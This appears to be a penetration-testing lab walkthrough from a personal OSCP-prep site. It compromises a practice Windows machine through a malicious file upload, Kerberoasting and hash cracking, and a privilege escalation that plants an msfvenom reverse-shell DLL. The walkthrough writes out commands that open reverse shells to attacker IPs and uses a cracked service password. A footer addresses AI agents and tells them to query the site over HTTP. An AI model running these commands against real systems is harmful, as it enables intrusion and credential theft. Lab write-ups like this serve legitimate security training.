# 80 ![](/files/3Mdntst6TbWsZpwNYp09) There is a file upload functionality: ![](/files/I86CdbylgGiDCqnOqZzS) We can try to replace the .htaccess file of the server since it is running apache. Running feroxbuster we also have an uploads directory. We have `shell.whatevs`: ![](/files/kVA55XzreqrBVuIEubKt) For command execution: ![](/files/OgsQFn2xEDHzS085NkfJ) Now run powershell base64 payload ![](/files/l0kMKY94oa5xmjiAoL3v) We have 2 service accounts: ![](/files/9CJzk0cOnOGKnlYDE1h9) We can try kerberoasting: ``` .\Rubeus.exe kerberoast /nowrap ``` ![](/files/pHwbun4dfEkxMPHCAssx) We got a hash for svc\_mssql. We can crack it with hashcat ![](/files/gedkkeeAJqW8kgicw0Zg) trustno1 Now to get a shell as svc\_mssql: ``` import-module .\Invoke-RunasCs.ps1 ``` ``` Invoke-RunasCs svc_mssql trustno1 cmd.exe -remote 192.168.45.229:1234 ``` We now get a shell at port 1234: ``` sudo rlwrap nc -nlvp 1234 ``` ![](/files/J6VTRJU0Vg9Ut0bNrV9k) ![](/files/sYNvxUUATruQqkiy17oD) Now we can use an exploit for SeManageVolumePrivilege: Run it first ``` SeManageVolumeExploit.exe ``` For Printconfig.dll: ```bash msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.190 LPORT=4444 -f dll -o Printconfig.dll ``` Then transfer to machine Then copy it: ``` copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\ ``` Then in powershell: ```powershell $type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}") $object = [Activator]::CreateInstance($type) ``` Now should have got a shell ![](/files/eleq45sO3GLKFM1V8TUZ) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://aditya-3.gitbook.io/oscp/readme/walkthroughs/pg-practice/access-2/80.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.